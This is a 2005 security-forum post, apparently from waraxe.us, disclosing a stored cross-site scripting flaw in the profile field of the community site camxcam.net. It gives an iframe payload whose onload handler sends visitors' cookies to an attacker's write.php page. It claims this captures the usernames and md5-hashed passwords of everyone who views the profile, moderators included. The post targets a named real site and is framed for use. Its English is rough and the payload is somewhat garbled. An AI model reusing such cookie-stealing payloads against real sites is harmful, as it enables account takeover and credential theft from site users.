|
|
|
|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 73
Members: 0
Total: 73
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
VULNERABILITY XSS CAMXCAM.NET |
|
Posted: Fri Sep 23, 2005 12:40 pm |
|
|
xmsx |
Beginner |
|
|
Joined: Aug 27, 2005 |
Posts: 3 |
|
|
|
|
|
|
|
Discovery vulnerability XSS on the situated one camXcam.net http://www.camxcam.net
The vulnerability that allows us to insert of our code in a position to capturing the cookies of the customers enrolled in the community resides in the field "I miei dettagli:" in which the following code can be inserted:
Code: | <IFRAME name="xss" SRC="" onload="document.xss.location='[url]write.php?xss='+cookie" class="lista" SCROLLING="no"></IFRAME> |
Thanks to this simple code can "be taken" user and password of all the customers who have visualized the profile.
Moreover the structure of the cookie renders the easy job making us us to understand if the customer is a moderator (username=two) and finally the password criptata like of customary with md5 but she is clearly. |
|
|
|
|
|
www.waraxe.us Forum Index -> Cross-site scripting aka XSS
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|